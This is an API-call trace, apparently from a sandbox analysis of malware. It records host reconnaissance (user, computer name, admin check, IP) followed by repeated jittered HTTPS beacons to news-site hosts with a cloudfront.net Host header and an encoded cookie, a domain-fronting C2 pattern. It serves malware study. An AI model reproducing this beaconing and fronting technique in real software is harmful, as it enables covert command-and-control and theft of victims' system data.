[0053.593] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x1d, wSecond=0x25, wMilliseconds=0x394))
[0053.593] CryptAcquireContextA (in: phProv=0x2cf9c4, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9c4*=0x306f30) returned 1
[0053.885] CryptGenRandom (in: hProv=0x306f30, dwLen=0x10, pbBuffer=0x2cfa34 | out: pbBuffer=0x2cfa34) returned 1
[0053.885] CryptReleaseContext (hProv=0x306f30, dwFlags=0x0) returned 1
[0053.890] GetCurrentProcessId () returned 0xc84
[0053.890] GetTickCount () returned 0x1fde3
[0053.890] GetLastError () returned 0x0
[0053.890] SetLastError (dwErrCode=0x0)
[0053.890] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x306f30) returned 1
[0053.891] CryptGenRandom (in: hProv=0x306f30, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0053.891] CryptReleaseContext (hProv=0x306f30, dwFlags=0x0) returned 1
[0053.891] GetUserNameA (in: lpBuffer=0x67d30dc, pcbBuffer=0x2cf9d8 | out: lpBuffer="CIiHmnxMn6Ps", pcbBuffer=0x2cf9d8) returned 1
[0053.894] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2cf9a4, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2cf99c | out: pSid=0x2cf99c*=0x309c18*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0053.894] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x309c18*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x2cf9a0 | out: IsMember=0x2cf9a0) returned 1
[0053.894] GetComputerNameA (in: lpBuffer=0x67d2fdc, nSize=0x2cf9d8 | out: lpBuffer="LHNIWSJ", nSize=0x2cf9d8) returned 1
[0053.894] GetVersionExA (in: lpVersionInformation=0x67d2f48*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x67d2f48*(dwOSVersionInfoSize=0x94, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x2800, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0053.894] GetCurrentProcess () returned 0xffffffff
[0053.895] GetModuleHandleA (lpModuleName="kernel32") returned 0x76bc0000
[0053.895] GetProcAddress (hModule=0x76bc0000, lpProcName="IsWow64Process") returned 0x76bd96e0
[0053.895] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf9a8 | out: Wow64Process=0x2cf9a8) returned 1
[0053.895] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x2cf7a8 | out: lpWSAData=0x2cf7a8) returned 0
[0053.897] gethostname (in: name=0x2cf948, namelen=80 | out: name="LHnIwsj") returned 0
[0054.367] gethostbyname (name="LHnIwsj") returned 0x308050*(h_name="LHnIwsj", h_aliases=0x308060*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x308064*=([0]="192.168.0.237"))
[0054.510] inet_ntoa (in=0xed00a8c0) returned="192.168.0.237"
[0054.510] GetCurrentProcessId () returned 0xc84
[0054.510] GetLastError () returned 0x0
[0054.510] SetLastError (dwErrCode=0x0)
[0054.510] htonl (hostlong=0x1) returned 0x1000000
[0054.510] htonl (hostlong=0x0) returned 0x0
[0054.510] htonl (hostlong=0x10) returned 0x10000000
[0054.510] htonl (hostlong=0x12) returned 0x12000000
[0054.510] htonl (hostlong=0x14) returned 0x14000000
[0054.510] htonl (hostlong=0x4c) returned 0x4c000000
[0054.510] htonl (hostlong=0xbeef) returned 0xefbe0000
[0054.511] CryptAcquireContextA (in: phProv=0x2cf91c, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf91c*=0x31f2d8) returned 1
[0054.512] CryptGenRandom (in: hProv=0x31f2d8, dwLen=0x29, pbBuffer=0x64072a | out: pbBuffer=0x64072a) returned 1
[0054.512] CryptReleaseContext (hProv=0x31f2d8, dwFlags=0x0) returned 1
[0054.516] GetLastError () returned 0x0
[0054.516] SetLastError (dwErrCode=0x0)
[0054.516] GetLastError () returned 0x0
[0054.516] SetLastError (dwErrCode=0x0)
[0054.516] GetLastError () returned 0x0
[0054.516] SetLastError (dwErrCode=0x0)
[0054.516] GetLastError () returned 0x0
[0054.516] SetLastError (dwErrCode=0x0)
[0054.516] GetLastError () returned 0x0
[0054.516] SetLastError (dwErrCode=0x0)
[0054.516] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0055.114] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0055.114] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0055.114] InternetConnectA (hInternet=0xcc0004, lpszServerName="maptile.usnews.com", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0055.114] GetLastError () returned 0x0
[0055.114] SetLastError (dwErrCode=0x0)
[0055.114] htonl (hostlong=0xa000000) returned 0xa
[0055.114] htonl (hostlong=0x22000000) returned 0x22
[0055.114] GetLastError () returned 0x0
[0055.114] SetLastError (dwErrCode=0x0)
[0055.114] htonl (hostlong=0xa000000) returned 0xa
[0055.114] htonl (hostlong=0x47000000) returned 0x47
[0055.114] GetLastError () returned 0x0
[0055.114] SetLastError (dwErrCode=0x0)
[0055.114] htonl (hostlong=0xa000000) returned 0xa
[0055.114] htonl (hostlong=0x1f000000) returned 0x1f
[0055.114] GetLastError () returned 0x0
[0055.114] SetLastError (dwErrCode=0x0)
[0055.114] htonl (hostlong=0x7000000) returned 0x7
[0055.114] htonl (hostlong=0x0) returned 0x0
[0055.114] htonl (hostlong=0x8000000) returned 0x8
[0055.114] htonl (hostlong=0x2000000) returned 0x2
[0055.114] htonl (hostlong=0x8000000) returned 0x8
[0055.114] htonl (hostlong=0x6000000) returned 0x6
[0055.114] htonl (hostlong=0x6000000) returned 0x6
[0055.115] GetLastError () returned 0x0
[0055.115] SetLastError (dwErrCode=0x0)
[0055.115] htonl (hostlong=0x0) returned 0x0
[0055.115] GetLastError () returned 0x0
[0055.115] SetLastError (dwErrCode=0x0)
[0055.127] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0055.138] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0055.138] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0055.140] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0056.309] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0056.309] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0056.309] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0056.311] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x1d, wSecond=0x28, wMilliseconds=0x27a))
[0056.311] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0056.311] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0056.311] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x1d, wSecond=0x28, wMilliseconds=0x27a))
[0056.311] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x384c50) returned 1
[0056.312] CryptGenRandom (in: hProv=0x384c50, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0056.312] CryptReleaseContext (hProv=0x384c50, dwFlags=0x0) returned 1
[0056.312] Sleep (dwMilliseconds=0x301e)
[0066.438] GetLastError () returned 0x0
[0066.438] SetLastError (dwErrCode=0x0)
[0066.438] GetLastError () returned 0x0
[0066.439] SetLastError (dwErrCode=0x0)
[0066.439] GetLastError () returned 0x0
[0066.439] SetLastError (dwErrCode=0x0)
[0066.439] GetLastError () returned 0x0
[0066.439] SetLastError (dwErrCode=0x0)
[0066.439] GetLastError () returned 0x0
[0066.439] SetLastError (dwErrCode=0x0)
[0066.439] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0066.439] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0066.439] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0066.439] InternetConnectA (hInternet=0xcc0004, lpszServerName="asset.wsj.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0066.439] GetLastError () returned 0x0
[0066.439] SetLastError (dwErrCode=0x0)
[0066.439] htonl (hostlong=0xa000000) returned 0xa
[0066.439] htonl (hostlong=0x22000000) returned 0x22
[0066.439] GetLastError () returned 0x0
[0066.439] SetLastError (dwErrCode=0x0)
[0066.439] htonl (hostlong=0xa000000) returned 0xa
[0066.439] htonl (hostlong=0x47000000) returned 0x47
[0066.439] GetLastError () returned 0x0
[0066.439] SetLastError (dwErrCode=0x0)
[0066.439] htonl (hostlong=0xa000000) returned 0xa
[0066.439] htonl (hostlong=0x1f000000) returned 0x1f
[0066.439] GetLastError () returned 0x0
[0066.439] SetLastError (dwErrCode=0x0)
[0066.439] htonl (hostlong=0x7000000) returned 0x7
[0066.439] htonl (hostlong=0x0) returned 0x0
[0066.439] htonl (hostlong=0x8000000) returned 0x8
[0066.439] htonl (hostlong=0x2000000) returned 0x2
[0066.439] htonl (hostlong=0x8000000) returned 0x8
[0066.439] htonl (hostlong=0x6000000) returned 0x6
[0066.439] htonl (hostlong=0x6000000) returned 0x6
[0066.439] GetLastError () returned 0x0
[0066.439] SetLastError (dwErrCode=0x0)
[0066.439] htonl (hostlong=0x0) returned 0x0
[0066.439] GetLastError () returned 0x0
[0066.439] SetLastError (dwErrCode=0x0)
[0066.439] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0066.440] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0066.440] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0066.440] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0067.224] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0067.224] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0067.224] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0067.224] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x1d, wSecond=0x33, wMilliseconds=0x220))
[0067.225] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0067.225] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0067.225] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x1d, wSecond=0x33, wMilliseconds=0x220))
[0067.225] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x384cd8) returned 1
[0067.225] CryptGenRandom (in: hProv=0x384cd8, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0067.225] CryptReleaseContext (hProv=0x384cd8, dwFlags=0x0) returned 1
[0067.225] Sleep (dwMilliseconds=0x39e5)
[0077.576] GetLastError () returned 0x0
[0077.576] SetLastError (dwErrCode=0x0)
[0077.576] GetLastError () returned 0x0
[0077.576] SetLastError (dwErrCode=0x0)
[0077.576] GetLastError () returned 0x0
[0077.576] SetLastError (dwErrCode=0x0)
[0077.576] GetLastError () returned 0x0
[0077.576] SetLastError (dwErrCode=0x0)
[0077.576] GetLastError () returned 0x0
[0077.577] SetLastError (dwErrCode=0x0)
[0077.577] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0077.577] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0077.577] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0077.577] InternetConnectA (hInternet=0xcc0004, lpszServerName="www.reutersmedia.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0077.577] GetLastError () returned 0x0
[0077.577] SetLastError (dwErrCode=0x0)
[0077.577] htonl (hostlong=0xa000000) returned 0xa
[0077.577] htonl (hostlong=0x22000000) returned 0x22
[0077.577] GetLastError () returned 0x0
[0077.577] SetLastError (dwErrCode=0x0)
[0077.577] htonl (hostlong=0xa000000) returned 0xa
[0077.577] htonl (hostlong=0x47000000) returned 0x47
[0077.577] GetLastError () returned 0x0
[0077.577] SetLastError (dwErrCode=0x0)
[0077.577] htonl (hostlong=0xa000000) returned 0xa
[0077.577] htonl (hostlong=0x1f000000) returned 0x1f
[0077.577] GetLastError () returned 0x0
[0077.577] SetLastError (dwErrCode=0x0)
[0077.577] htonl (hostlong=0x7000000) returned 0x7
[0077.577] htonl (hostlong=0x0) returned 0x0
[0077.577] htonl (hostlong=0x8000000) returned 0x8
[0077.577] htonl (hostlong=0x2000000) returned 0x2
[0077.577] htonl (hostlong=0x8000000) returned 0x8
[0077.577] htonl (hostlong=0x6000000) returned 0x6
[0077.577] htonl (hostlong=0x6000000) returned 0x6
[0077.577] GetLastError () returned 0x0
[0077.577] SetLastError (dwErrCode=0x0)
[0077.577] htonl (hostlong=0x0) returned 0x0
[0077.577] GetLastError () returned 0x0
[0077.577] SetLastError (dwErrCode=0x0)
[0077.578] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0077.578] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0077.578] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0077.578] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0078.311] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0078.311] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0078.311] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0078.311] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x1e, wSecond=0x2, wMilliseconds=0x270))
[0078.311] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0078.311] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0078.311] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x1e, wSecond=0x2, wMilliseconds=0x270))
[0078.311] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x384cd8) returned 1
[0078.311] CryptGenRandom (in: hProv=0x384cd8, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0078.311] CryptReleaseContext (hProv=0x384cd8, dwFlags=0x0) returned 1
[0078.311] Sleep (dwMilliseconds=0x336f)
[0088.319] GetLastError () returned 0x0
[0088.319] SetLastError (dwErrCode=0x0)
[0088.319] GetLastError () returned 0x0
[0088.319] SetLastError (dwErrCode=0x0)
[0088.319] GetLastError () returned 0x0
[0088.320] SetLastError (dwErrCode=0x0)
[0088.320] GetLastError () returned 0x0
[0088.320] SetLastError (dwErrCode=0x0)
[0088.320] GetLastError () returned 0x0
[0088.320] SetLastError (dwErrCode=0x0)
[0088.320] GetLastError () returned 0x0
[0088.320] SetLastError (dwErrCode=0x0)
[0088.320] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0088.320] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0088.320] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0088.320] InternetConnectA (hInternet=0xcc0004, lpszServerName="maptile.usnews.com", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0088.320] GetLastError () returned 0x0
[0088.320] SetLastError (dwErrCode=0x0)
[0088.320] htonl (hostlong=0xa000000) returned 0xa
[0088.320] htonl (hostlong=0x22000000) returned 0x22
[0088.320] GetLastError () returned 0x0
[0088.320] SetLastError (dwErrCode=0x0)
[0088.320] htonl (hostlong=0xa000000) returned 0xa
[0088.320] htonl (hostlong=0x47000000) returned 0x47
[0088.320] GetLastError () returned 0x0
[0088.320] SetLastError (dwErrCode=0x0)
[0088.320] htonl (hostlong=0xa000000) returned 0xa
[0088.320] htonl (hostlong=0x1f000000) returned 0x1f
[0088.320] GetLastError () returned 0x0
[0088.320] SetLastError (dwErrCode=0x0)
[0088.320] htonl (hostlong=0x7000000) returned 0x7
[0088.320] htonl (hostlong=0x0) returned 0x0
[0088.320] htonl (hostlong=0x8000000) returned 0x8
[0088.320] htonl (hostlong=0x2000000) returned 0x2
[0088.320] htonl (hostlong=0x8000000) returned 0x8
[0088.320] htonl (hostlong=0x6000000) returned 0x6
[0088.320] htonl (hostlong=0x6000000) returned 0x6
[0088.320] GetLastError () returned 0x0
[0088.320] SetLastError (dwErrCode=0x0)
[0088.320] htonl (hostlong=0x0) returned 0x0
[0088.320] GetLastError () returned 0x0
[0088.320] SetLastError (dwErrCode=0x0)
[0088.320] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0088.320] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0088.320] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0088.320] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0090.179] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0090.179] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0090.179] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0090.179] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x1e, wSecond=0xe, wMilliseconds=0x1f7))
[0090.179] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0090.179] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0090.179] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x1e, wSecond=0xe, wMilliseconds=0x1f7))
[0090.179] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x384cd8) returned 1
[0090.180] CryptGenRandom (in: hProv=0x384cd8, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0090.180] CryptReleaseContext (hProv=0x384cd8, dwFlags=0x0) returned 1
[0090.180] Sleep (dwMilliseconds=0x39fe)
[0100.187] GetLastError () returned 0x0
[0100.187] SetLastError (dwErrCode=0x0)
[0100.187] GetLastError () returned 0x0
[0100.187] SetLastError (dwErrCode=0x0)
[0100.187] GetLastError () returned 0x0
[0100.187] SetLastError (dwErrCode=0x0)
[0100.187] GetLastError () returned 0x0
[0100.187] SetLastError (dwErrCode=0x0)
[0100.187] GetLastError () returned 0x0
[0100.187] SetLastError (dwErrCode=0x0)
[0100.187] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0100.187] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0100.187] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0100.187] InternetConnectA (hInternet=0xcc0004, lpszServerName="asset.wsj.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0100.187] GetLastError () returned 0x0
[0100.187] SetLastError (dwErrCode=0x0)
[0100.187] htonl (hostlong=0xa000000) returned 0xa
[0100.187] htonl (hostlong=0x22000000) returned 0x22
[0100.187] GetLastError () returned 0x0
[0100.188] SetLastError (dwErrCode=0x0)
[0100.188] htonl (hostlong=0xa000000) returned 0xa
[0100.188] htonl (hostlong=0x47000000) returned 0x47
[0100.188] GetLastError () returned 0x0
[0100.188] SetLastError (dwErrCode=0x0)
[0100.188] htonl (hostlong=0xa000000) returned 0xa
[0100.188] htonl (hostlong=0x1f000000) returned 0x1f
[0100.188] GetLastError () returned 0x0
[0100.188] SetLastError (dwErrCode=0x0)
[0100.188] htonl (hostlong=0x7000000) returned 0x7
[0100.188] htonl (hostlong=0x0) returned 0x0
[0100.188] htonl (hostlong=0x8000000) returned 0x8
[0100.188] htonl (hostlong=0x2000000) returned 0x2
[0100.188] htonl (hostlong=0x8000000) returned 0x8
[0100.188] htonl (hostlong=0x6000000) returned 0x6
[0100.188] htonl (hostlong=0x6000000) returned 0x6
